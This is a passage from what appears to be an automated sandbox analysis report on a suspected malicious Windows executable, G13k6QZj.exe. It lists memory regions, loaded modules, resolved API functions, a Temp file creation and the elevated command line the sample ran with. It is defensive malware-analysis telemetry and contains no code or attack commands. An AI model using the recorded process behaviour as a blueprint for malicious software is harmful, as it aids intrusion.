| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x007effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x007dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x007effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x00977fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x00b00fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b10000 | 0x00b10000 | 0x01f0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:26 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #198: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #198 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "PhotoViewer.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:16, Reason: Child Process |
| Unmonitor | End Time: 00:03:19, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6e0 |
| Parent PID | 0xa1c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
60C
0x
C94
0x
428
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00310000 | 0x00339fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00310fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x0086ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x00a37fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x00bc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000bd0000 | 0x00bd0000 | 0x01fcffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
